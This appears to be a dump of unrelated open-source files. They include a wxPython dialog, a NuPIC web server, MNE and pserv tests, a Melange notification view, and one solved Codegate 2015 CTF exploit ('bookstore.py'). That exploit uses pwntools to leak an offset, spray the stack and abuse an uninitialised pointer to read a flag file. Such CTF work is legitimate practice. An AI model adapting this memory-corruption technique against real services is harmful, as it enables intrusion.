grid.Add(lbl_psu, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.cbox_psu, pos=(row,1), span=(0,3), flag=wx.ALL|wx.EXPAND, border=5)
grid.AddGrowableCol(1)
row += 1
text_voltage = wx.StaticText(panel, label="Set Voltage:")
self.spin_voltage = wx.SpinCtrl(panel, max=30, min=0, size=(50, -1))
self.spin_voltage2 = wx.SpinCtrl(panel, max=99, min=0, size=(50, -1))
self.spin_voltage.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.spin_voltage2.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.lbl_voltage = wx.StaticText(panel, label="0.0v")
grid.Add(text_voltage, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.spin_voltage, pos=(row,1), flag=wx.ALL, border=5)
grid.Add(self.spin_voltage2, pos=(row,2), flag=wx.ALL, border=5)
grid.Add(self.lbl_voltage, pos=(row,3), flag=wx.ALL|wx.EXPAND, border=5)
sbox_sizer.Add(grid, 1, wx.ALL|wx.EXPAND, 0)
sbox_sizer.AddSpacer(10)
#-----
hsizer = wx.BoxSizer(wx.HORIZONTAL)
hsizer.AddStretchSpacer()
btn_cancel = wx.Button(panel, label="Cancel", id=wx.ID_CANCEL)
btn_cancel.Bind(wx.EVT_BUTTON, self.OnButton)
self.btn_add = wx.Button(panel, label="Add", id=wx.ID_OK)
self.btn_add.Bind(wx.EVT_BUTTON, self.OnButton)
hsizer.Add(btn_cancel, 0, wx.ALL|wx.EXPAND, 5)
hsizer.Add(self.btn_add, 0, wx.ALL|wx.EXPAND, 5)
#add to main sizer
sizer.Add(sbox_sizer, 0, wx.ALL|wx.EXPAND, 2)
sizer.Add(hsizer, 0, wx.ALL|wx.EXPAND, 5)
panel.SetSizer(sizer)
w, h = sizer.Fit(self)
# self.SetSize((w, h*1.5))
# self.SetMinSize((w, h*1.5))
# self.SetMaxSize(sizer.Fit(self))
try:
self.SetIcon(theme.GetIcon("psu_png"))
except:
pass
self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)
def OnKeyUp(self, event):
key = event.GetKeyCode()
print(event)
        if key == wx.WXK_ESCAPE:
self.EndModal(wx.ID_CANCEL)
def OnSpinVoltage(self, event=None):
v0 = self.spin_voltage.GetValue()
v1 = self.spin_voltage2.GetValue()
label = str(v0) + "." + str(v1) + "v"
self.lbl_voltage.SetLabel(label)
def OnButton(self, event):
e = event.GetEventObject()
label = e.GetLabel()
id = e.GetId()
if label == "Cancel":
self.EndModal(id)
elif label == "Add":
self.EndModal(id)
def SetValue(self, data):
params = data["parameters"]
params = "), " + params[1:-1] + ", (" #so we can split it easier
param_dict = {}
params = params.split("), (")
for param in params:
param = param[1: -1]
if param == "":
continue
key, value = param.split("', '")
param_dict[key] = value
self.cbox_psu.SetValue(param_dict["psu"])
self.lbl_voltage.SetLabel(param_dict["v0"])
spin1, spin2 = param_dict["v0"][:-1].split(".")
self.spin_voltage.SetValue(spin1)
self.spin_voltage2.SetValue(spin2)
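    # Illustrative round trip between SetValue() and GetValue(): GetValue()
    # below serialises the widget state as str() of a list of tuples, e.g.
    #
    #   "[('psu', 'PSU_1'), ('v0', '12.5v')]"
    #
    # and SetValue() above rebuilds {'psu': 'PSU_1', 'v0': '12.5v'} from that
    # string before refilling the widgets (the PSU name is just an example).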
def GetValue(self):
psu = self.cbox_psu.GetValue()
if psu != "":
for char in psu:
if char.isdigit() or char.isalpha():
continue
psu = psu.replace(char, "_")
data = [("psu", psu),
("v0", self.lbl_voltage.GetLabel())]
data = {"action":"Set Voltage",
"parameters":str(data),}
return data | mit | -3,217,298,695,919,984,600 | 30.867925 | 89 | 0.530004 | false |
NunoEdgarGub1/nupic | nupic/simple_server.py | 1 | 3599 | #! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
A simple web server for interacting with NuPIC.
Note: Requires web.py to run (install using '$ pip install web.py')
"""
import os
import sys
# The following loop removes the nupic.nupic package from the
# PythonPath (sys.path). This is necessary in order to let web
# import the built in math module rather than defaulting to
# nupic.math
while True:
try:
sys.path.remove(os.path.dirname(os.path.realpath(__file__)))
except:
break
import datetime
import json
import web
from nupic.frameworks.opf.modelfactory import ModelFactory
g_models = {}
urls = (
# Web UI
"/models", "ModelHandler",
r"/models/([-\w]*)", "ModelHandler",
r"/models/([-\w]*)/run", "ModelRunner",
)
class ModelHandler(object):
def GET(self):
"""
/models
returns:
[model1, model2, model3, ...] list of model names
"""
global g_models
return json.dumps({"models": g_models.keys()})
def POST(self, name):
"""
/models/{name}
schema:
{
"modelParams": dict containing model parameters
"predictedFieldName": str
}
returns:
{"success":name}
"""
global g_models
data = json.loads(web.data())
modelParams = data["modelParams"]
predictedFieldName = data["predictedFieldName"]
if name in g_models.keys():
raise web.badrequest("Model with name <%s> already exists" % name)
model = ModelFactory.create(modelParams)
model.enableInference({'predictedField': predictedFieldName})
g_models[name] = model
return json.dumps({"success": name})
class ModelRunner(object):
def POST(self, name):
"""
/models/{name}/run
schema:
{
predictedFieldName: value
timestamp: %m/%d/%y %H:%M
}
NOTE: predictedFieldName MUST be the same name specified when
creating the model.
returns:
{
"predictionNumber":<number of record>,
"anomalyScore":anomalyScore
}
"""
global g_models
data = json.loads(web.data())
data["timestamp"] = datetime.datetime.strptime(
data["timestamp"], "%m/%d/%y %H:%M")
if name not in g_models.keys():
raise web.notfound("Model with name <%s> does not exist." % name)
modelResult = g_models[name].run(data)
predictionNumber = modelResult.predictionNumber
anomalyScore = modelResult.inferences["anomalyScore"]
return json.dumps({"predictionNumber": predictionNumber,
"anomalyScore": anomalyScore})
web.config.debug = False
app = web.application(urls, globals())
if __name__ == "__main__":
app.run()
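# Illustrative client-side sketch (not exercised by this module): the host,
# port, model name, field name and MODEL_PARAMS are placeholders -- web.py
# serves on port 8080 by default unless another port is given on the command
# line.
#
#   import json, requests   # 'requests' is an assumed helper library
#
#   requests.post('http://localhost:8080/models/tutorial',
#                 data=json.dumps({'modelParams': MODEL_PARAMS,
#                                  'predictedFieldName': 'consumption'}))
#   requests.post('http://localhost:8080/models/tutorial/run',
#                 data=json.dumps({'consumption': 5.3,
#                                  'timestamp': '07/02/10 00:00'}))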
| gpl-3.0 | 307,131,252,297,311,600 | 23.82069 | 72 | 0.639066 | false |
ARudiuk/mne-python | mne/io/array/tests/test_array.py | 3 | 3552 | from __future__ import print_function
# Author: Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import warnings
import matplotlib
from numpy.testing import assert_array_almost_equal, assert_allclose
from nose.tools import assert_equal, assert_raises, assert_true
from mne import find_events, Epochs, pick_types
from mne.io import Raw
from mne.io.array import RawArray
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.meas_info import create_info, _kind_dict
from mne.utils import slow_test, requires_version, run_tests_if_main
matplotlib.use('Agg') # for testing don't use X server
warnings.simplefilter('always') # enable b/c these tests might throw warnings
base_dir = op.join(op.dirname(__file__), '..', '..', 'tests', 'data')
fif_fname = op.join(base_dir, 'test_raw.fif')
@slow_test
@requires_version('scipy', '0.12')
def test_array_raw():
"""Test creating raw from array
"""
import matplotlib.pyplot as plt
# creating
raw = Raw(fif_fname).crop(2, 5, copy=False)
data, times = raw[:, :]
sfreq = raw.info['sfreq']
ch_names = [(ch[4:] if 'STI' not in ch else ch)
for ch in raw.info['ch_names']] # change them, why not
# del raw
types = list()
for ci in range(102):
types.extend(('grad', 'grad', 'mag'))
types.extend(['stim'] * 9)
types.extend(['eeg'] * 60)
# wrong length
assert_raises(ValueError, create_info, ch_names, sfreq, types)
# bad entry
types.append('foo')
assert_raises(KeyError, create_info, ch_names, sfreq, types)
types[-1] = 'eog'
# default type
info = create_info(ch_names, sfreq)
assert_equal(info['chs'][0]['kind'], _kind_dict['misc'][0])
# use real types
info = create_info(ch_names, sfreq, types)
raw2 = _test_raw_reader(RawArray, test_preloading=False,
data=data, info=info, first_samp=2 * data.shape[1])
data2, times2 = raw2[:, :]
assert_allclose(data, data2)
assert_allclose(times, times2)
assert_true('RawArray' in repr(raw2))
assert_raises(TypeError, RawArray, info, data)
# filtering
picks = pick_types(raw2.info, misc=True, exclude='bads')[:4]
assert_equal(len(picks), 4)
raw_lp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_lp.filter(0., 4.0 - 0.25, picks=picks, n_jobs=2)
raw_hp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_hp.filter(8.0 + 0.25, None, picks=picks, n_jobs=2)
raw_bp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bp.filter(4.0 + 0.25, 8.0 - 0.25, picks=picks)
raw_bs = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bs.filter(8.0 + 0.25, 4.0 - 0.25, picks=picks, n_jobs=2)
data, _ = raw2[picks, :]
lp_data, _ = raw_lp[picks, :]
hp_data, _ = raw_hp[picks, :]
bp_data, _ = raw_bp[picks, :]
bs_data, _ = raw_bs[picks, :]
sig_dec = 11
assert_array_almost_equal(data, lp_data + bp_data + hp_data, sig_dec)
assert_array_almost_equal(data, bp_data + bs_data, sig_dec)
# plotting
raw2.plot()
raw2.plot_psd()
plt.close('all')
# epoching
events = find_events(raw2, stim_channel='STI 014')
events[:, 2] = 1
assert_true(len(events) > 2)
epochs = Epochs(raw2, events, 1, -0.2, 0.4, preload=True)
epochs.plot_drop_log()
epochs.plot()
evoked = epochs.average()
evoked.plot()
assert_equal(evoked.nave, len(events) - 1)
plt.close('all')
run_tests_if_main()
| bsd-3-clause | -862,542,634,687,912,300 | 32.509434 | 79 | 0.630349 | false |
Qwaz/solved-hacking-problem | Codegate/2015 Quals/bookstore/bookstore.py | 1 | 1395 | from pwn import *
def talk(send, until, no_newline=False):
if until:
str = r.recvuntil(until)
print str + send
if no_newline:
r.send(send)
else:
r.sendline(send)
else:
str = r.recv()
print str + send
if no_newline:
r.send(send)
else:
r.sendline(send)
r = remote('localhost', 8020)
# Login
talk('helloadmin', 'ID : ')
talk('iulover!@#$%', 'PASSWORD : ')
# Add Book
talk('1', '> ')
talk('book', '\n')
talk('desc', '\n')
talk('0', '\n')
# Modify Price and Stock
talk('2', '> ')
talk('0', 'No : ')
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('aaaa'*100, '\n')
talk('xxxx'*100, 'description\n')
talk('0', 'menu!\n')
# Get Offset
talk('4', '> ')
offset_before = r.recvuntil('a'*20)
offset_str = r.recvuntil('> ')
offset = u32(offset_str[8:12])
log.success("%x" % offset)
offset = offset - 0x9AD + 0x8DB
log.success("%x" % offset)
print offset_before + offset_str
# Fill Stack
r.sendline('2')
talk('0', 'No : ')
talk('2', 'menu!\n')
talk(p32(offset)*750, '\n')
# Uninitialized Shipping Pointer
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('./flag', '\n', no_newline=True)
talk('desc', 'description\n')
# Modify Freeshipping
talk('4', 'menu!\n')
talk('1', '\n')
talk('0', 'menu!\n')
# Call ViewBook
talk('3', '> ')
talk('0', 'No : ')
# Close Program
talk('0', '> ')
| gpl-2.0 | -2,153,698,298,135,402,800 | 16.658228 | 40 | 0.564158 | false |
SRabbelier/Melange | app/soc/views/models/notification.py | 1 | 9142 | #!/usr/bin/env python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains the view code for Notifications.
"""
__authors__ = [
'"Lennard de Rijk" <[email protected]>',
]
import time
from google.appengine.ext import db
from django import forms
from django import http
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.logic.models.notification import logic as notification_logic
from soc.logic.models.site import logic as site_logic
from soc.logic.models.user import logic as user_logic
from soc.models import notification as notification_model
from soc.views import helper
from soc.views.helper import access
from soc.views.helper import decorators
from soc.views.helper import lists as list_helper
from soc.views.helper import redirects
from soc.views.models import base
class CreateForm(helper.forms.BaseForm):
"""Form for creating a Notification.
"""
# to user field
to_user = forms.fields.CharField(label='To User')
def __init__(self, *args, **kwargs):
""" Calls super and then redefines the order in which the fields appear.
for parameters see BaseForm.__init__()
"""
super(CreateForm, self).__init__(*args, **kwargs)
# set form fields order
self.fields.keyOrder = ['to_user', 'subject', 'message']
class Meta:
"""Inner Meta class that defines some behavior for the form.
"""
model = notification_model.Notification
fields = None
# exclude the necessary fields from the form
exclude = ['link_id', 'scope', 'scope_path', 'from_user', 'unread']
clean_to_user = cleaning.clean_existing_user('to_user')
class View(base.View):
"""View methods for the Notification model.
"""
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.Checker(params)
rights['edit'] = ['deny']
rights['show'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['delete'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['list'] = ['checkIsUser']
# create is developer only for the time being to test functionality
rights['create'] = ['checkIsDeveloper']
new_params = {}
new_params['logic'] = notification_logic
new_params['rights'] = rights
new_params['name'] = "Notification"
new_params['no_create_with_key_fields'] = True
new_params['create_form'] = CreateForm
new_params['edit_redirect'] = '/%(url_name)s/list'
new_params['public_configuration'] = {"multiselect": True}
new_params['public_field_prefetch'] = ['from_user']
new_params['public_field_extra'] = lambda entity: {
"from": entity.from_user.name if entity.from_user else
site_logic.getSingleton().site_name,
"unread": "Not Read" if entity.unread else "Read",
}
new_params['public_field_props'] = {
"unread": {
"stype": "select",
"editoptions": {"value": ":All;^Read$:Read;^Not Read$:Not Read"}
}
}
new_params['public_conf_extra'] = {
"multiselect": True,
}
new_params['public_field_keys'] = ["unread", "from", "subject",
"created_on",]
new_params['public_field_names'] = ["Unread", "From", "Subject",
"Received on"]
new_params['public_button_global'] = [
{
'bounds': [1,'all'],
'id': 'mark_read',
'caption': 'Mark as Read',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'mark_unread',
'caption': 'Mark as Unread',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'delete',
'caption': 'Delete Notification',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
}]
params = dicts.merge(params, new_params)
params['public_row_extra'] = lambda entity: {
"link": redirects.getPublicRedirect(entity, params)
}
super(View, self).__init__(params=params)
@decorators.merge_params
@decorators.check_access
def list(self, request, access_type, page_name=None, params=None,
filter=None, order=None, **kwargs):
"""Lists all notifications that the current logged in user has stored.
for parameters see base.list()
"""
if request.method == 'POST':
return self.listPost(request, params, **kwargs)
else: # request.method == 'GET'
if not order:
order = ['-created_on']
user_entity = user_logic.getCurrentUser()
filter = {'scope': user_entity}
return super(View, self).list(request, access_type, page_name=page_name,
params=params, filter=filter, order=order,
**kwargs)
def listPost(self, request, params, **kwargs):
"""Handles the POST request for the list of notifications.
"""
import logging
from django.utils import simplejson
post_dict = request.POST
data = simplejson.loads(post_dict.get('data', '[]'))
button_id = post_dict.get('button_id', '')
user_entity = user_logic.getCurrentUser()
notifications = []
for selection in data:
notification = notification_logic.getFromKeyName(selection['key'])
if not notification:
logging.error('No notification found for %(key)s' %selection)
continue
if notification.scope.key() == user_entity.key():
notifications.append(notification)
if button_id == 'delete':
for notification in notifications:
notification_logic.delete(notification)
elif button_id == 'mark_read' or button_id == 'mark_unread':
if button_id == 'mark_read':
# mark all the Notifications selected as read
fields = {'unread': False}
elif button_id == 'mark_unread':
# mark all the Notifications selected as unread
fields = {'unread': True}
for notification in notifications:
notification_logic.updateEntityProperties(notification, fields,
store=False)
db.put(notifications)
# return a 200 response to signal that all is okay
return http.HttpResponseRedirect('')
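  # Minimal sketch of the POST payload listPost() above expects from the list
  # UI buttons (the key name is illustrative):
  #
  #   button_id: one of 'delete', 'mark_read' or 'mark_unread'
  #   data:      a JSON list of selected rows, e.g. '[{"key": "<key name>"}]'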
def _editPost(self, request, entity, fields):
"""See base.View._editPost().
"""
# get the current user
current_user = user_logic.getCurrentUser()
fields['link_id'] = 't%i' % (int(time.time()*100))
fields['scope'] = fields['to_user']
fields['from_user'] = current_user
fields['scope_path'] = fields['to_user'].link_id
def _editSeed(self, request, seed):
"""Checks if scope_path is seeded and puts it into to_user.
for parameters see base._editSeed()
"""
# if scope_path is present
if 'scope_path' in seed.keys():
# fill the to_user field with the scope path
seed['to_user'] = seed['scope_path']
def _public(self, request, entity, context):
"""Marks the Notification as read if that hasn't happened yet.
for parameters see base._public()
"""
# if the user viewing is the user for which this notification is meant
# and the notification has not been read yet
if entity.unread:
# get the current user
user = user_logic.getCurrentUser()
# if the message is meant for the user that is reading it
# pylint: disable=E1103
if entity.scope.key() == user.key():
# mark the entity as read
self._logic.updateEntityProperties(entity, {'unread' : False} )
context['entity_type_url'] = self._params['url_name']
context['entity_suffix'] = entity.key().id_or_name() if entity else None
context['page_name'] = 'Notification - %s' % (entity.subject)
return True
view = View()
admin = decorators.view(view.admin)
create = decorators.view(view.create)
edit = decorators.view(view.edit)
delete = decorators.view(view.delete)
list = decorators.view(view.list)
public = decorators.view(view.public)
export = decorators.view(view.export)
| apache-2.0 | -9,177,998,094,437,962,000 | 30.415808 | 80 | 0.618355 | false |
DarkEnergyScienceCollaboration/pserv | tests/test_Pserv.py | 1 | 18496 | """
Unit tests for pserv package.
"""
from __future__ import absolute_import, print_function
import os
import csv
import unittest
from collections import OrderedDict
from warnings import filterwarnings
import ConfigParser
import numpy as np
import astropy.io.fits as fits
import desc.pserv
filterwarnings('ignore')
def get_db_info():
"""
Try to connect to Travis CI MySQL services or the user's via
~/.my.cnf and return the connection info. Otherwise, return
an empty dict, which should skip the tests.
"""
try:
try:
# Travis CI usage:
db_info = dict(database='myapp_test', username='travis',
host='127.0.0.1', port='3306')
desc.pserv.DbConnection(**db_info)
except RuntimeError as eobj:
print(eobj)
# Read the user's default configuration from ~/.my.cnf
parser = ConfigParser.ConfigParser()
parser.read(os.path.join(os.environ['HOME'], '.my.cnf'))
db_info = dict(parser.items('client'))
db_info['database'] = 'test'
if db_info.has_key('user'):
del db_info['user']
if db_info.has_key('password'):
del db_info['password']
desc.pserv.DbConnection(**db_info)
except StandardError as eobj:
print("No database connection:")
print(eobj)
db_info = {}
return db_info
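# Minimal sketch of the ~/.my.cnf section read by get_db_info() above when the
# Travis CI connection is unavailable (host and port are placeholders):
#
#   [client]
#   host = 127.0.0.1
#   port = 3306
#   user = <db user>
#   password = <db password>
#
# 'user' and 'password' are dropped from the dict before connecting, so the
# 'test' database has to be reachable without explicit credentials.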
_db_info = get_db_info()
@unittest.skipUnless(_db_info, "MySQL database not available")
class PservTestCase(unittest.TestCase):
"""
TestCase for Pserv module.
"""
def setUp(self):
"""
Create a connection and test table.
"""
self.connection = desc.pserv.DbConnection(**_db_info)
self.test_table = 'my_test'
self.project = 'my project'
self.data = (('a', 1, 130., 3.1943029977e-24, self.project),
('b', 4, 1.4938229e-20, 4.408099891e10, self.project),
('c', 100, np.pi, np.pi, self.project),
('d', 3, 4.9039542e20, 9.487982348e30, self.project))
self._create_test_table()
# FITS/csv related set up:
self.fits_file = 'my_test_data.fits'
self._create_fits_bintable()
self.csv_file = self._create_csv_file()
def tearDown(self):
"""
Drop the test table and close the connection.
"""
self.connection.apply('drop table if exists %s;' % self.test_table)
del self.connection
# FITS/csv related tear down:
if os.path.isfile(self.fits_file):
os.remove(self.fits_file)
if os.path.isfile(self.csv_file):
os.remove(self.csv_file)
def _create_test_table(self):
"""
Create the test table.
"""
self.connection.apply('drop table if exists %s;' % self.test_table)
query = """create table %s (keywd char(1), int_value int,
float_value float, double_value double,
project char(30));""" % self.test_table
self.connection.apply(query)
def _fill_test_table(self):
"""
Fill the test db table with key/value pairs from self.data.
"""
table_name = self.test_table
values = ','.join(["('%s', %i, %e, %e, '%s')" % row
for row in self.data]) + ';'
query = "insert into %(table_name)s values %(values)s" % locals()
self.connection.apply(query)
def _query_test_table(self):
"""
Query for the test table contents.
"""
query = """select keywd, int_value, float_value, double_value,
project from %s""" % self.test_table
return self.connection.apply(
query, cursorFunc=lambda curs: tuple(x for x in curs))
    def _compare_to_ref_data(self, query_data, places=5):
        "Compare data from queries to reference data."
for query_row, ref_row in zip(query_data, self.data):
self.assertEqual(query_row[0], ref_row[0])
self.assertEqual(query_row[1], ref_row[1])
format_ = '%.' + str(places) + 'e'
fp1 = format_ % query_row[2]
fp2 = format_ % ref_row[2]
self.assertEqual(fp1, fp2)
self.assertEqual(query_row[4], self.project)
#self.assertAlmostEqual(query_row[2], ref_row[2], places=places)
def test_apply_cursorFunc(self):
"""
Test the apply method using a cursor function to retrieve and
package the query results.
"""
self._fill_test_table()
table_data = self._query_test_table()
self._compare_to_ref_data(table_data)
def _create_fits_bintable(self):
"""
Create the test FITS file with a binary table with the data in
self.data.
"""
hdulist = fits.HDUList()
hdulist.append(fits.PrimaryHDU())
colnames = ['KEYWORD', 'INT_VALUE', 'FLOAT_VALUE', 'DOUBLE_VALUE']
formats = 'AIED'
data = list(zip(*self.data))
columns = [fits.Column(name=colnames[i], format=formats[i],
array=data[i]) for i in range(len(colnames))]
bintable = fits.BinTableHDU.from_columns(columns)
bintable.name = 'TEST_DATA'
hdulist.append(bintable)
if os.path.isfile(self.fits_file):
os.remove(self.fits_file)
hdulist.writeto(self.fits_file)
@staticmethod
def _create_fits_bintable_with_flags(fits_file):
"Create a FITS binary table with flags."
hdulist = fits.HDUList()
hdulist.append(fits.PrimaryHDU())
nbits = 64
nflags = 100
colnames = ['flags', 'id']
formats = ['%sX' % nflags, 'K']
data = [(np.array([True] + (nflags-1)*[False]),
np.array((nbits-1)*[False] + [True] + (nflags-nbits)*[False]),
np.array(nbits*[False] + [True] + (nflags-nbits-1)*[False])),
(0, 1, 2)]
columns = [fits.Column(name=colnames[i], format=formats[i],
array=data[i]) for i in range(len(colnames))]
bintable = fits.BinTableHDU.from_columns(columns)
bintable.name = 'TEST_DATA'
hdulist.append(bintable)
if os.path.isfile(fits_file):
os.remove(fits_file)
hdulist.writeto(fits_file, clobber=True)
def _create_csv_file(self, csv_file='test_file.csv',
column_mapping=None, fits_hdnum=1):
"""
Create a csv file from the FITS binary table.
"""
if column_mapping is None:
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
desc.pserv.create_csv_file_from_fits(self.fits_file, fits_hdnum,
csv_file,
column_mapping=column_mapping)
return csv_file
@staticmethod
def _read_csv_file(csv_file):
csv_data = []
with open(csv_file, 'r') as csv_input:
reader = csv.reader(csv_input, delimiter=',')
for i, row in enumerate(reader):
if i == 0:
# Skip the header line.
continue
csv_data.append((row[0], int(row[1]), float(row[2]),
np.float64(row[3]), row[4]))
return csv_data
def test_create_csv_file_from_fits(self):
"""
Test the creation of a csv file from a FITS binary table.
"""
csv_data = self._read_csv_file(self.csv_file)
self._compare_to_ref_data(csv_data)
def test_create_csv_file_from_fits_with_constant_columns(self):
"""
        Test the creation of a csv file from a FITS binary table with
constant numeric column values set in the column_mapping.
"""
int_value = 52
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', int_value),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
csv_file = self._create_csv_file(column_mapping=column_mapping)
csv_data = self._read_csv_file(csv_file)
for csv_row, ref_row in zip(csv_data, self.data):
self.assertEqual(csv_row[0], ref_row[0])
self.assertEqual(csv_row[1], int_value)
fp1 = '%.5e' % csv_row[2]
fp2 = '%.5e' % ref_row[2]
self.assertEqual(fp1, fp2)
fp1 = '%.10e' % csv_row[3]
fp2 = '%.10e' % ref_row[3]
self.assertEqual(fp1, fp2)
float_value = 719.3449
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', float_value),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
csv_file = self._create_csv_file(column_mapping=column_mapping)
csv_data = self._read_csv_file(csv_file)
for csv_row, ref_row in zip(csv_data, self.data):
self.assertEqual(csv_row[0], ref_row[0])
self.assertEqual(csv_row[1], ref_row[1])
fp1 = '%.5e' % csv_row[2]
fp2 = '%.5e' % float_value
self.assertEqual(fp1, fp2)
fp1 = '%.10e' % csv_row[3]
fp2 = '%.10e' % ref_row[3]
self.assertEqual(fp1, fp2)
def test_create_csv_file_from_fits_with_callbacks(self):
"""
Test the creation of a csv file from a FITS binary table with
        callback functions (e.g., conversion to nanomaggies using the
        zero point flux) applied to certain columns.
"""
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
callbacks = dict((('FLOAT_VALUE', lambda x: 2.981*x),
('DOUBLE_VALUE', lambda x: 0.321*x)))
csv_file = 'test_file_scaling.csv'
fits_hdunum = 1
desc.pserv.create_csv_file_from_fits(self.fits_file, fits_hdunum,
csv_file,
column_mapping=column_mapping,
callbacks=callbacks)
csv_data = self._read_csv_file(csv_file)
for csv_row, ref_row in zip(csv_data, self.data):
self.assertEqual(csv_row[0], ref_row[0])
self.assertEqual(csv_row[1], ref_row[1])
fp1 = '%.5e' % csv_row[2]
fp2 = '%.5e' % (callbacks['FLOAT_VALUE'](ref_row[2]))
self.assertEqual(fp1, fp2)
fp1 = '%.10e' % csv_row[3]
fp2 = '%.10e' % (callbacks['DOUBLE_VALUE'](ref_row[3]))
self.assertEqual(fp1, fp2)
os.remove(csv_file)
def test_create_csv_file_from_fits_with_added_columns(self):
"Test create_csv_file_from_fits with added columns."
fits_file = os.path.join(os.environ['PSERV_DIR'], 'tests',
'ref-0-10,11_truncated.fits.gz')
hdunum = 1
csv_file = 'test_added_columns.csv'
projectId = 1
desc.pserv.create_csv_file_from_fits(fits_file, hdunum, csv_file,
added_columns=dict(projectId=projectId))
with open(csv_file) as csv_data:
reader = csv.reader(csv_data, delimiter=',')
            row = next(reader)
self.assertEqual(row[-1], 'projectId')
for row in reader:
self.assertEqual(row[-1], '%s' % projectId)
os.remove(csv_file)
def test_load_csv(self):
"""
Test that after loading the csv file generated from FITS data,
a query returns data consistent with the reference data.
"""
csv_file = self.csv_file
self.connection.load_csv(self.test_table, csv_file)
table_data = self._query_test_table()
self._compare_to_ref_data(table_data)
def test_incorrect_csv_mapping(self):
"""
Test that an incorrect column mapping raises a RuntimeError.
"""
# Test incorrect column ordering.
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('float_value', 'FLOAT_VALUE'),
('int_value', 'INT_VALUE'),
('double_value', 'DOUBLE_VALUE')))
csv_file = self._create_csv_file(column_mapping=column_mapping)
self.assertRaises(RuntimeError, self.connection.load_csv,
*(self.test_table, csv_file))
# Test incorrect column name.
column_mapping = OrderedDict((('keyword', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE')))
csv_file = self._create_csv_file(column_mapping=column_mapping)
self.assertRaises(RuntimeError, self.connection.load_csv,
*(self.test_table, csv_file))
# Test incorrect number of columns.
column_mapping = OrderedDict((('keyword', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('float2_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE')))
csv_file = self._create_csv_file(column_mapping=column_mapping)
self.assertRaises(RuntimeError, self.connection.load_csv,
*(self.test_table, csv_file))
os.remove(csv_file)
def test_create_schema_from_fits(self):
"Test the creation of a schema from a FITS binary table."
catalog_file = os.path.join(os.environ['PSERV_DIR'], 'tests',
'ref-0-10,11_truncated.fits.gz')
sql_file = 'bintable_schema.sql'
fits_hdunum = 1
table_name = 'deepCoadd_catalog'
desc.pserv.create_schema_from_fits(catalog_file, fits_hdunum, sql_file,
table_name,
primary_key='id, project',
add_columns=('project INT',))
with open(sql_file) as schema:
lines = [x.strip() for x in schema.readlines()]
self.assertIn('id BIGINT,', lines)
self.assertIn('coord_ra DOUBLE,', lines)
self.assertIn('deblend_nChild INT,', lines)
self.assertIn('base_SdssShape_xxSigma FLOAT,', lines)
self.assertIn('FLAGS1 BIGINT UNSIGNED,', lines)
self.assertIn('FLAGS2 BIGINT UNSIGNED,', lines)
self.assertIn('FLAGS3 BIGINT UNSIGNED,', lines)
self.assertIn('primary key (id, project)', lines)
self.assertIn('project INT,', lines)
os.remove(sql_file)
def test_create_csv_file_from_fits_with_flag(self):
"Test create_csv_file_from_fits for a file with flags."
fits_file = 'test_bin_table_flags.fits'
hdunum = 1
